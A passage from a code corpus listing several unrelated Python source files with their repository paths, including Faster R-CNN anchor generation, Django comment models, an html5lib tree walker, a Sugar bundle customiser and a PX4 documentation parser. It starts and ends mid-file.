# [-167., -343., 184., 360.]])
def generate_anchors_bak(ratios=[0.5, 1, 2],
scales=2**np.arange(3, 6), base_size=16):
"""
Generate anchor (reference) windows by enumerating aspect ratios X
scales wrt a reference (0, 0, 15, 15) window.
"""
ratois = np.array(ratios)
scales = np.array(scales)
base_anchor = np.array([1, 1, base_size, base_size]) - 1
ratio_anchors = _ratio_enum(base_anchor, ratios)
anchors = np.vstack([_scale_enum(ratio_anchors[i, :], scales)
for i in xrange(ratio_anchors.shape[0])])
return anchors
def generate_anchors(ratios, scales, base_size=16):
# print 'ratios', ratios
# print 'scales', scales
base_anchor = np.array([1, 1, base_size, base_size]) - 1
w, h, x_ctr, y_ctr = _whctrs(base_anchor)
size = w * h
size_ratios = size / ratios
ws = np.round(np.sqrt(size_ratios))
hs = np.round(ws * ratios)
ws = ws * np.array(scales)
hs = hs * np.array(scales)
# print 'ws', ws
# print 'hs', hs
anchors = _mkanchors(ws, hs, x_ctr, y_ctr)
# print 'anchors', anchors
return anchors
def _whctrs(anchor):
"""
Return width, height, x center, and y center for an anchor (window).
"""
w = anchor[2] - anchor[0] + 1
h = anchor[3] - anchor[1] + 1
x_ctr = anchor[0] + 0.5 * (w - 1)
y_ctr = anchor[1] + 0.5 * (h - 1)
return w, h, x_ctr, y_ctr
def _mkanchors(ws, hs, x_ctr, y_ctr):
"""
Given a vector of widths (ws) and heights (hs) around a center
(x_ctr, y_ctr), output a set of anchors (windows).
"""
# print 'ws', ws
ws = ws[:, np.newaxis]
hs = hs[:, np.newaxis]
anchors = np.hstack((x_ctr - 0.5 * (ws - 1),
y_ctr - 0.5 * (hs - 1),
x_ctr + 0.5 * (ws - 1),
y_ctr + 0.5 * (hs - 1)))
return anchors
def _ratio_enum(anchor, ratios):
"""
Enumerate a set of anchors for each aspect ratio wrt an anchor.
"""
w, h, x_ctr, y_ctr = _whctrs(anchor)
size = w * h
size_ratios = size / ratios
ws = np.round(np.sqrt(size_ratios))
hs = np.round(ws * ratios)
anchors = _mkanchors(ws, hs, x_ctr, y_ctr)
return anchors
def _scale_enum(anchor, scales):
"""
Enumerate a set of anchors for each scale wrt an anchor.
"""
w, h, x_ctr, y_ctr = _whctrs(anchor)
ws = w * scales
hs = h * scales
anchors = _mkanchors(ws, hs, x_ctr, y_ctr)
return anchors
if __name__ == '__main__':
import time
t = time.time()
a = generate_anchors()
print time.time() - t
print a
from IPython import embed; embed()
|
arifsetiawan/edx-platform
|
refs/heads/master
|
lms/djangoapps/mailing/management/commands/mailchimp_id.py
|
155
|
"""
mailchimp_id: Returns whether or not a given mailchimp key represents
a valid list.
"""
import sys
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from mailsnake import MailSnake
class Command(BaseCommand):
"""
Given a mailchimp key, validates that a list with that key
exists in mailchimp.
"""
args = '<mailchimp_key web_id>'
help = 'Get the list id from a web_id'
option_list = BaseCommand.option_list + (
make_option('--key', action='store', help='mailchimp api key'),
make_option('--webid', action='store', dest='web_id', type=int,
help='mailchimp list web id'),
)
def parse_options(self, options):
"""Parses `options` of the command."""
if not options['key']:
raise CommandError('missing key')
if not options['web_id']:
raise CommandError('missing list web id')
return options['key'], options['web_id']
def handle(self, *args, **options):
"""
Validates that the id passed in exists in mailchimp.
"""
key, web_id = self.parse_options(options)
mailchimp = MailSnake(key)
lists = mailchimp.lists()['data']
by_web_id = {l['web_id']: l for l in lists}
list_with_id = by_web_id.get(web_id, None)
if list_with_id:
print "id: {} for web_id: {}".format(list_with_id['id'], web_id)
print "list name: {}".format(list_with_id['name'])
else:
print "list with web_id: {} not found.".format(web_id)
sys.exit(1)
|
andrewsmedina/django
|
refs/heads/master
|
django/contrib/comments/models.py
|
125
|
from django.conf import settings
from django.contrib.comments.managers import CommentManager
from django.contrib.contenttypes import generic
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.core import urlresolvers
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
COMMENT_MAX_LENGTH = getattr(settings, 'COMMENT_MAX_LENGTH', 3000)
class BaseCommentAbstractModel(models.Model):
"""
An abstract base class that any custom comment models probably should
subclass.
"""
# Content-object field
content_type = models.ForeignKey(ContentType,
verbose_name=_('content type'),
related_name="content_type_set_for_%(class)s")
object_pk = models.TextField(_('object ID'))
content_object = generic.GenericForeignKey(ct_field="content_type", fk_field="object_pk")
# Metadata about the comment
site = models.ForeignKey(Site)
class Meta:
abstract = True
def get_content_object_url(self):
"""
Get a URL suitable for redirecting to the content object.
"""
return urlresolvers.reverse(
"comments-url-redirect",
args=(self.content_type_id, self.object_pk)
)
@python_2_unicode_compatible
class Comment(BaseCommentAbstractModel):
"""
A user comment about some object.
"""
# Who posted this comment? If ``user`` is set then it was an authenticated
# user; otherwise at least user_name should have been set and the comment
# was posted by a non-authenticated user.
user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_('user'),
blank=True, null=True, related_name="%(class)s_comments")
user_name = models.CharField(_("user's name"), max_length=50, blank=True)
user_email = models.EmailField(_("user's email address"), blank=True)
user_url = models.URLField(_("user's URL"), blank=True)
comment = models.TextField(_('comment'), max_length=COMMENT_MAX_LENGTH)
# Metadata about the comment
submit_date = models.DateTimeField(_('date/time submitted'), default=None)
ip_address = models.GenericIPAddressField(_('IP address'), unpack_ipv4=True, blank=True, null=True)
is_public = models.BooleanField(_('is public'), default=True,
help_text=_('Uncheck this box to make the comment effectively ' \
'disappear from the site.'))
is_removed = models.BooleanField(_('is removed'), default=False,
help_text=_('Check this box if the comment is inappropriate. ' \
'A "This comment has been removed" message will ' \
'be displayed instead.'))
# Manager
objects = CommentManager()
class Meta:
db_table = "django_comments"
ordering = ('submit_date',)
permissions = [("can_moderate", "Can moderate comments")]
verbose_name = _('comment')
verbose_name_plural = _('comments')
def __str__(self):
return "%s: %s..." % (self.name, self.comment[:50])
def save(self, *args, **kwargs):
if self.submit_date is None:
self.submit_date = timezone.now()
super(Comment, self).save(*args, **kwargs)
def _get_userinfo(self):
"""
Get a dictionary that pulls together information about the poster
safely for both authenticated and non-authenticated comments.
This dict will have ``name``, ``email``, and ``url`` fields.
"""
if not hasattr(self, "_userinfo"):
userinfo = {
"name": self.user_name,
"email": self.user_email,
"url": self.user_url
}
if self.user_id:
u = self.user
if u.email:
userinfo["email"] = u.email
# If the user has a full name, use that for the user name.
# However, a given user_name overrides the raw user.username,
# so only use that if this comment has no associated name.
if u.get_full_name():
userinfo["name"] = self.user.get_full_name()
elif not self.user_name:
userinfo["name"] = u.get_username()
self._userinfo = userinfo
return self._userinfo
userinfo = property(_get_userinfo, doc=_get_userinfo.__doc__)
def _get_name(self):
return self.userinfo["name"]
def _set_name(self, val):
if self.user_id:
raise AttributeError(_("This comment was posted by an authenticated "\
"user and thus the name is read-only."))
self.user_name = val
name = property(_get_name, _set_name, doc="The name of the user who posted this comment")
def _get_email(self):
return self.userinfo["email"]
def _set_email(self, val):
if self.user_id:
raise AttributeError(_("This comment was posted by an authenticated "\
"user and thus the email is read-only."))
self.user_email = val
email = property(_get_email, _set_email, doc="The email of the user who posted this comment")
def _get_url(self):
return self.userinfo["url"]
def _set_url(self, val):
self.user_url = val
url = property(_get_url, _set_url, doc="The URL given by the user who posted this comment")
def get_absolute_url(self, anchor_pattern="#c%(id)s"):
return self.get_content_object_url() + (anchor_pattern % self.__dict__)
def get_as_text(self):
"""
Return this comment as plain text. Useful for emails.
"""
d = {
'user': self.user or self.name,
'date': self.submit_date,
'comment': self.comment,
'domain': self.site.domain,
'url': self.get_absolute_url()
}
return _('Posted by %(user)s at %(date)s\n\n%(comment)s\n\nhttp://%(domain)s%(url)s') % d
@python_2_unicode_compatible
class CommentFlag(models.Model):
"""
Records a flag on a comment. This is intentionally flexible; right now, a
flag could be:
* A "removal suggestion" -- where a user suggests a comment for (potential) removal.
* A "moderator deletion" -- used when a moderator deletes a comment.
You can (ab)use this model to add other flags, if needed. However, by
design users are only allowed to flag a comment with a given flag once;
if you want rating look elsewhere.
"""
user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_('user'), related_name="comment_flags")
comment = models.ForeignKey(Comment, verbose_name=_('comment'), related_name="flags")
flag = models.CharField(_('flag'), max_length=30, db_index=True)
flag_date = models.DateTimeField(_('date'), default=None)
# Constants for flag types
SUGGEST_REMOVAL = "removal suggestion"
MODERATOR_DELETION = "moderator deletion"
MODERATOR_APPROVAL = "moderator approval"
class Meta:
db_table = 'django_comment_flags'
unique_together = [('user', 'comment', 'flag')]
verbose_name = _('comment flag')
verbose_name_plural = _('comment flags')
def __str__(self):
return "%s flag of comment ID %s by %s" % \
(self.flag, self.comment_id, self.user.get_username())
def save(self, *args, **kwargs):
if self.flag_date is None:
self.flag_date = timezone.now()
super(CommentFlag, self).save(*args, **kwargs)
|
musicwarez/testproj
|
refs/heads/master
|
testproj/my_test/1.py
|
1
|
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
import sys
import login_form
import login
import untitled as main_window
import main
from Queue import Queue
class FirstWindow(login.LoginWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = login_form.Ui_LoginDialog()
self.ui.setupUi(self)
#self.thread = MyThread(self)
class MainWindow(main.MainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
self.ui = main_window.Ui_MainWindow()
self.ui.setupUi(self)
class MainClass(FirstWindow, MainWindow):
def __init__(self, parent=None):
FirstWindow.__init__(self, parent)
self.queue = Queue()
self.fw = FirstWindow()
self.main = MainWindow()
print "Try connect"
#self.connect(fw, QtCore.SIGNAL("logined()"), main.show)
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
window = MainClass()
window.fw.show()
window.fw.center()
window.main.connect(window.fw, QtCore.SIGNAL("logined()"), window.main.show)
# Отображаем окно
sys.exit(app.exec_()) #Запускаем цикл обработки
|
dkodnik/arp
|
refs/heads/master
|
addons/im_livechat/__init__.py
|
40
|
import im_livechat
|
mujiansu/pip
|
refs/heads/develop
|
pip/_vendor/html5lib/treewalkers/genshistream.py
|
1730
|
from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import _base
from ..constants import voidElements, namespaces
class TreeWalker(_base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, pos = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END
or next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
|
sauravpratihar/sugar
|
refs/heads/master
|
src/jarabe/view/customizebundle.py
|
10
|
# Copyright (C) 2011 Walter Bender
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import glob
import hashlib
from gi.repository import Gtk
from sugar3 import profile
from sugar3.activity import bundlebuilder
from sugar3.datastore import datastore
from sugar3.env import get_user_activities_path
import logging
_logger = logging.getLogger('ViewSource')
BADGE_SUBPATH = 'emblems/emblem-view-source.svg'
BADGE_TRANSFORM = ' <g transform="matrix(0.45,0,0,0.45,32,32)">\n'
ICON_TRANSFORM = ' <g transform="matrix(1.0,0,0,1.0,0,0)">\n'
XML_HEADER = '<?xml version="1.0" ?> \
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" \
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [\n\
<!ENTITY stroke_color "#010101">\n\
<!ENTITY fill_color "#FFFFFF">\n]>\n'
SVG_START = '<svg enable-background="new 0 0 55 55" height="55px" \
version="1.1" viewBox="0 0 55 55" width="55px" x="0px" xml:space="preserve" \
xmlns="http://www.w3.org/2000/svg" \
xmlns:xlink="http://www.w3.org/1999/xlink" y="0px">\n'
SVG_END = '</svg>\n'
def generate_unique_id():
"""Generate an id based on the user's nick name and their public key
(Based on schema used by IRC activity).
"""
nick = profile.get_nick_name()
pubkey = profile.get_pubkey()
m = hashlib.sha1()
m.update(pubkey)
hexhash = m.hexdigest()
nick_letters = "".join([x for x in nick if x.isalpha()])
if not nick_letters:
nick_letters = 'XO'
return nick_letters + '_' + hexhash[:4]
def generate_bundle(nick, new_basename):
"""Generate a new .xo bundle for the activity and copy it into the
Journal.
"""
new_activity_name = _customize_activity_info(
nick, new_basename)
user_activities_path = get_user_activities_path()
if os.path.exists(os.path.join(user_activities_path, new_basename,
'dist')):
for path in glob.glob(os.path.join(user_activities_path, new_basename,
'dist', '*')):
os.remove(path)
config = bundlebuilder.Config(source_dir=os.path.join(
user_activities_path, new_basename),
dist_name='%s-1' % (new_activity_name))
bundlebuilder.cmd_dist_xo(config, None)
dsobject = datastore.create()
dsobject.metadata['title'] = '%s-1.xo' % (new_activity_name)
dsobject.metadata['mime_type'] = 'application/vnd.olpc-sugar'
dsobject.set_file_path(os.path.join(
user_activities_path, new_basename, 'dist',
'%s-1.xo' % (new_activity_name)))
datastore.write(dsobject)
dsobject.destroy()
def _customize_activity_info(nick, new_basename):
"""Modify bundle_id in new activity.info file:
(1) change the bundle_id to bundle_id_[NICKNAME];
(2) change the activity_icon [NICKNAME]-activity-icon.svg;
(3) set activity_version to 1;
(4) modify the activity icon by applying a customize overlay.
"""
new_activity_name = ''
user_activities_path = get_user_activities_path()
info_old = open(os.path.join(user_activities_path, new_basename,
'activity', 'activity.info'), 'r')
info_new = open(os.path.join(user_activities_path, new_basename,
'activity', 'new_activity.info'), 'w')
for line in info_old:
if line.find('=') < 0:
info_new.write(line)
continue
name, value = [token.strip() for token in line.split('=', 1)]
if name == 'bundle_id':
new_value = '%s_%s' % (value, nick)
elif name == 'activity_version':
new_value = '1'
elif name == 'icon':
new_value = value
icon_name = value
elif name == 'name':
new_value = '%s_copy_of_%s' % (nick, value)
new_activity_name = new_value
else:
info_new.write(line)
continue
info_new.write('%s = %s\n' % (name, new_value))
info_old.close()
info_new.close()
os.rename(os.path.join(user_activities_path, new_basename,
'activity', 'new_activity.info'),
os.path.join(user_activities_path, new_basename,
'activity', 'activity.info'))
_create_custom_icon(new_basename, icon_name)
return new_activity_name
def _create_custom_icon(new_basename, icon_name):
"""Modify activity icon by overlaying a badge:
(1) Extract the payload from the badge icon;
(2) Add a transform to resize it and position it;
(3) Insert it into the activity icon.
"""
user_activities_path = get_user_activities_path()
badge_path = None
for path in Gtk.IconTheme.get_default().get_search_path():
if os.path.exists(os.path.join(path, 'sugar', 'scalable',
BADGE_SUBPATH)):
badge_path = path
break
if badge_path is None:
_logger.debug('%s not found', BADGE_SUBPATH)
return
badge_fd = open(os.path.join(badge_path, 'sugar', 'scalable',
BADGE_SUBPATH), 'r')
badge_payload = _extract_svg_payload(badge_fd)
badge_fd.close()
badge_svg = BADGE_TRANSFORM + badge_payload + '\n</g>'
icon_path = os.path.join(user_activities_path, new_basename, 'activity',
icon_name + '.svg')
icon_fd = open(icon_path, 'r')
icon_payload = _extract_svg_payload(icon_fd)
icon_fd.close()
icon_svg = ICON_TRANSFORM + icon_payload + '\n</g>'
tmp_path = os.path.join(user_activities_path, new_basename, 'activity',
'tmp.svg')
tmp_icon_fd = open(tmp_path, 'w')
tmp_icon_fd.write(XML_HEADER)
tmp_icon_fd.write(SVG_START)
tmp_icon_fd.write(icon_svg)
tmp_icon_fd.write(badge_svg)
tmp_icon_fd.write(SVG_END)
tmp_icon_fd.close()
os.remove(icon_path)
os.rename(tmp_path, icon_path)
def _extract_svg_payload(fd):
"""Returns everything between <svg ...> and </svg>"""
payload = ''
looking_for_start_svg_token = True
looking_for_close_token = True
looking_for_end_svg_token = True
for line in fd:
if looking_for_start_svg_token:
if line.find('<svg') < 0:
continue
looking_for_start_svg_token = False
line = line.split('<svg', 1)[1]
if looking_for_close_token:
if line.find('>') < 0:
continue
looking_for_close_token = False
line = line.split('>', 1)[1]
if looking_for_end_svg_token:
if line.find('</svg>') < 0:
payload += line
continue
payload += line.split('</svg>')[0]
break
return payload
|
jswanljung/iris
|
refs/heads/master
|
lib/iris/tests/experimental/__init__.py
|
17
|
# (C) British Crown Copyright 2010 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Experimental code is tested in this package.
"""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
|
mcgill-robotics/Firmware
|
refs/heads/master
|
Tools/px4moduledoc/srcparser.py
|
2
|
import sys
import re
import math
import textwrap
class ModuleDocumentation(object):
"""
documentation for a single module
"""
valid_categories = ['driver', 'estimator', 'controller', 'system',
'communication', 'command', 'template']
max_line_length = 80 # wrap lines that are longer than this
def __init__(self, function_calls, scope):
"""
:param function_calls: list of tuples (function_name, [str(arg)])
"""
self._name = ''
self._category = ''
self._doc_string = ''
self._usage_string = ''
self._first_command = True
self._scope = scope
self._options = '' # all option chars
self._all_values = [] # list of all values
self._all_commands = []
for func_name, args in function_calls:
attribute_name = '_handle_'+func_name.lower()
try:
f = getattr(self, attribute_name)
f(args)
except AttributeError:
raise Exception('unhandled function: PRINT_MODULE_'+func_name)
self._usage_string = self._wrap_long_lines(self._usage_string, 17)
def _handle_description(self, args):
assert(len(args) == 1) # description
self._doc_string = self._get_string(args[0])
def _handle_usage_name(self, args):
assert(len(args) == 2) # executable_name, category
self._name = self._get_string(args[0])
self._category = self._get_string(args[1])
self._usage_string = "%s <command> [arguments...]\n" % self._name
self._usage_string += " Commands:\n"
def _handle_usage_name_simple(self, args):
assert(len(args) == 2) # executable_name, category
self._name = self._get_string(args[0])
self._category = self._get_string(args[1])
self._usage_string = "%s [arguments...]\n" % self._name
def _handle_usage_command_descr(self, args):
assert(len(args) == 2) # name, description
name = self._get_string(args[0])
self._all_commands.append(name)
if self._first_command:
self._first_command = False
else:
self._usage_string += "\n"
if self._is_string(args[1]):
description = self._get_string(args[1])
self._usage_string += " %-13s %s\n" % (name, description)
else:
self._usage_string += " %s\n" % name
def _handle_usage_command(self, args):
assert(len(args) == 1) # name
args.append('nullptr')
self._handle_usage_command_descr(args)
def _handle_usage_default_commands(self, args):
assert(len(args) == 0)
self._handle_usage_command(['"stop"'])
self._handle_usage_command_descr(['"status"', '"print status info"'])
def _handle_usage_param_int(self, args):
assert(len(args) == 6) # option_char, default_val, min_val, max_val, description, is_optional
option_char = self._get_option_char(args[0])
default_val = int(args[1])
description = self._get_string(args[4])
if self._is_bool_true(args[5]):
self._usage_string += " [-%s <val>] %s\n" % (option_char, description)
self._usage_string += " default: %i\n" % default_val
else:
self._usage_string += " -%s <val> %s\n" % (option_char, description)
def _handle_usage_param_float(self, args):
assert(len(args) == 6) # option_char, default_val, min_val, max_val, description, is_optional
option_char = self._get_option_char(args[0])
default_val = self._get_float(args[1])
description = self._get_string(args[4])
if self._is_bool_true(args[5]):
self._usage_string += " [-%s <val>] %s\n" % (option_char, description)
self._usage_string += " default: %.1f\n" % default_val
else:
self._usage_string += " -%s <val> %s\n" % (option_char, description)
def _handle_usage_param_flag(self, args):
assert(len(args) == 3) # option_char, description, is_optional
option_char = self._get_option_char(args[0])
description = self._get_string(args[1])
if self._is_bool_true(args[2]):
self._usage_string += " [-%c] %s\n" % (option_char, description)
else:
self._usage_string += " -%c %s\n" % (option_char, description)
def _handle_usage_param_string(self, args):
assert(len(args) == 5) # option_char, default_val, values, description, is_optional
option_char = self._get_option_char(args[0])
description = self._get_string(args[3])
if self._is_bool_true(args[4]):
self._usage_string += " [-%c <val>] %s\n" % (option_char, description)
else:
self._usage_string += " -%c <val> %s\n" % (option_char, description)
if self._is_string(args[2]):
values = self._get_string(args[2])
self._all_values.append(values)
if self._is_string(args[1]):
default_val = self._get_string(args[1])
self._usage_string += " values: %s, default: %s\n" %(values, default_val)
else:
self._usage_string += " values: %s\n" % values
else:
if self._is_string(args[1]):
default_val = self._get_string(args[1])
self._usage_string += " default: %s\n" % default_val
def _handle_usage_param_comment(self, args):
assert(len(args) == 1) # comment
comment = self._get_string(args[0])
self._usage_string += self._wrap_long_lines("\n %s\n" % comment, 1)
def _handle_usage_arg(self, args):
assert(len(args) == 3) # values, description, is_optional
values = self._get_string(args[0])
self._all_values.append(values)
description = self._get_string(args[1])
if self._is_bool_true(args[2]):
values += ']'
self._usage_string += " [%-10s %s\n" % (values, description)
else:
self._usage_string += " %-11s %s\n" % (values, description)
def _get_string(self, string):
return string[1:-1] # remove the " at start & end
def _get_float(self, string):
f = string
if f[-1] == 'f':
f = f[:-1]
return float(f)
def _is_string(self, argument):
return len(argument) > 0 and argument[0] == '"'
def _is_bool_true(self, argument):
return len(argument) > 0 and argument == 'true'
def _get_option_char(self, argument):
assert(len(argument) == 3) # must have the form: 'p' (assume there's no escaping)
option_char = argument[1]
self._options += option_char
return option_char
def _wrap_long_lines(self, string, indentation_spaces):
"""
wrap long lines in a string
:param indentation_spaces: number of added spaces on continued lines
"""
ret = ''
for s in string.splitlines():
ret += textwrap.fill(s, self.max_line_length,
subsequent_indent=' '*indentation_spaces)+'\n'
return ret
def name(self):
return self._name
def category(self):
return self._category
def scope(self):
return self._scope
def documentation(self):
doc_string = self._doc_string
# convert '$ cmd' commands into code blocks (e.g. '$ logger start')
# use lookahead (?=...) so the multiple consecutive command lines work
doc_string = re.sub(r"\n\$ (.*)(?=\n)", r"\n```\n\1\n```", doc_string)
# now merge consecutive blocks
doc_string = re.sub(r"\n```\n```\n", r"\n", doc_string)
return doc_string
def usage_string(self):
usage_string = self._usage_string
while len(usage_string) > 1 and usage_string[-1] == '\n':
usage_string = usage_string[:-1]
return usage_string
def options(self):
"""
get all the -p options as string of chars
"""
return self._options
def all_values(self):
"""
get a list of all command values
"""
return self._all_values
def all_commands(self):
"""
get a list of all commands
"""
return self._all_commands
class SourceParser(object):
"""
Parses provided data and stores all found parameters internally.
"""
# Regex to extract module doc function calls, starting with PRINT_MODULE_
re_doc_definition = re.compile(r'PRINT_MODULE_([A-Z_]*)\s*\(')
def __init__(self):
self._modules = {} # all found modules: key is the module name
self._consistency_checks_failure = False # one or more checks failed
self._comment_remove_pattern = re.compile(
r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
re.DOTALL | re.MULTILINE)
def Parse(self, scope, contents):
"""
Incrementally parse program contents and append all found documentations
to the list.
"""
# remove comments from source
contents = self._comment_remover(contents)
extracted_function_calls = [] # list of tuples: (FUNC_NAME, list(ARGS))
start_index = 0
while start_index < len(contents):
# skip whitespace
while start_index < len(contents) and contents[start_index] in [ ' ', '\t']:
start_index += 1
end_index = contents.find('\n', start_index)
if end_index == -1: end_index = len(contents)
line = contents[start_index:end_index]
# Ignore empty lines and macro #if's
if line == "" or line.startswith('#if'):
start_index = end_index + 1
continue
m = self.re_doc_definition.match(contents, start_index, end_index)
if m:
func_name = m.group(1)
end_index_match = m.span()[1]
next_start_index, arguments = self._parse_arguments(contents, end_index_match)
extracted_function_calls.append((func_name, arguments))
start_index = end_index + 1
if next_start_index > start_index:
start_index = next_start_index
continue
start_index = end_index + 1
if len(extracted_function_calls) > 0:
# add the module to the dict
module_doc = ModuleDocumentation(extracted_function_calls, scope)
if module_doc.name() == '':
raise Exception('PRINT_MODULE_USAGE_NAME not given for ' + scope)
if not module_doc.category() in ModuleDocumentation.valid_categories:
raise Exception('Invalid/unknown category ' +
module_doc.category() + ' for ' + scope)
self._do_consistency_check(contents, scope, module_doc)
self._modules[module_doc.name()] = module_doc
return True
def _comment_remover(self, text):
""" remove C++ & C style comments.
Source: https://stackoverflow.com/a/241506 """
def replacer(match):
s = match.group(0)
if s.startswith('/'):
return " " # note: a space and not an empty string
else:
return s
return re.sub(self._comment_remove_pattern, replacer, text)
def _do_consistency_check(self, contents, scope, module_doc):
"""
check the documentation for consistency with the code (arguments to
getopt() and others). This is only approximative, but should catch cases
where an option was added and not documented.
"""
# search all option chars in getopt() calls, combine them & compare
# against the documented set
getopt_args = re.findall(r"\b(px4_|)getopt\b.*\"([a-zA-Z:]+)\"", contents)
# there could be several getopt calls and it is not simple to find which
# command it belongs to, so combine all into a single string
getopt_args = reduce(lambda a, b: a + b[1], getopt_args, '').replace(':', '')
# some modules don't use getopt or parse the options in another file,
# so only check if both lists are not empty
if len(getopt_args) > 0 and len(module_doc.options()) > 0:
# sort & remove duplicates
sorted_getopt_args = ''.join(set(sorted(getopt_args)))
sorted_module_options = ''.join(set(sorted(module_doc.options())))
if sorted_getopt_args != sorted_module_options:
failed = True
# do one more test: check if strcmp(..."-x"... is used instead
if len(sorted_getopt_args) < len(sorted_module_options):
failed = False
# iterate options that are only in module doc
for c in set(sorted_module_options) - set(sorted_getopt_args):
if len(re.findall(r"\bstrcmp\b.*\"-"+c+r"\"", contents)) == 0:
failed = True
if failed:
print("Warning: documentation inconsistency in %s:" % scope)
print(" Documented options : %s" % sorted_module_options)
print(" Options found in getopt(): %s" % sorted_getopt_args)
self._consistency_checks_failure = True
# now check the commands: search for strcmp(argv[i], "command".
# this will also find the value arguments, so append them too to the
# module doc strings
commands = re.findall(r"\bstrcmp\b.*argv\[.*\"(.+)\"", contents) + \
re.findall(r"\bstrcmp\b.*\"(.+)\".*argv\[", contents) + \
re.findall(r"\bstrcmp\b.*\bverb\b.*\"(.+)\"", contents)
doc_commands = module_doc.all_commands() + \
[x for value in module_doc.all_values() for x in value.split('|')]
for command in commands:
if len(command) == 2 and command[0] == '-':
continue # skip options
if command in ['start', 'stop', 'status']:
continue # handled in the base class
if not command in doc_commands:
print("Warning: undocumented command '%s' in %s" %(command, scope))
self._consistency_checks_failure = True
# limit the maximum line length in the module doc string
max_line_length = 120
module_doc = module_doc.documentation()
verbatim_mode = False
line_nr = 0
for line in module_doc.split('\n'):
line_nr += 1
if line.strip().startswith('```'):
# ignore preformatted blocks
verbatim_mode = not verbatim_mode
elif not verbatim_mode:
if not 'www.' in line and not 'http' in line:
if len(line) > max_line_length:
print('Line too long (%i > %i) in %s:' % (len(line), max_line_length, scope))
print(' '+line)
self._consistency_checks_failure = True
def _parse_arguments(self, contents, start_index):
"""
parse function arguments into a list and return a tuple with (index, [str(args)])
where the index points to the start of the next line.
example: contents[start_index:] may look like:
'p', nullptr, "<topic_name>");
[...]
"""
args = []
next_position = start_index
current_string = ''
while next_position < len(contents):
# skip whitespace
while next_position < len(contents) and contents[next_position] in [' ', '\t', '\n']:
next_position += 1
if next_position >= len(contents):
continue
if contents[next_position] == '\"':
next_position += 1
string = ''
string_start = next_position
while next_position < len(contents):
if contents[next_position] == '\\': # escaping
if contents[next_position + 1] != '\n': # skip if continued on next line
string += contents[next_position:next_position+2].decode('string_escape')
next_position += 2
elif contents[next_position] == '"':
next_position += 1
break
else:
string += contents[next_position]
next_position += 1
# store the string, as it could continue in the form "a" "b"
current_string += string
elif contents.startswith('//', next_position): # comment
next_position = contents.find('\n', next_position)
elif contents.startswith('/*', next_position): # comment
next_position = contents.find('*/', next_position) + 2
else:
if current_string != '':
args.append('"'+current_string+'"')
current_string = ''
if contents.startswith('R\"', next_position): # C++11 raw string literal
bracket = contents.find('(', next_position)
identifier = contents[next_position+2:bracket]
raw_string_end = contents.find(')'+identifier+'"', next_position)
args.append('"'+contents[next_position+3+len(identifier):raw_string_end]+'"')
next_position = raw_string_end+len(identifier)+2
elif contents[next_position] == ')':
break # finished
elif contents[next_position] == ',':
next_position += 1 # skip
elif contents[next_position] == '(':
raise Exception('parser error: unsupported "(" in function arguments')
else:
# keyword (true, nullptr, ...), number or char (or variable).
# valid separators are: \n, ,, ), //, /*
next_arg_pos = contents.find(',', next_position)
m = re.search(r"\n|,|\)|//|/\*", contents[next_position:])
if m:
next_arg_pos = m.start() + next_position
args.append(contents[next_position:next_arg_pos].strip())
else:
raise Exception('parser error')
next_position = next_arg_pos
#print(args)
# find the next line
next_position = contents.find('\n', next_position)
if next_position >= 0: next_position += 1
return next_position, args
def HasValidationFailure(self):
return self._consistency_checks_failure
def GetModuleGroups(self):
"""
Returns a dictionary of all categories with a list of associated modules.
"""
groups = {}
for module_name in self._modules:
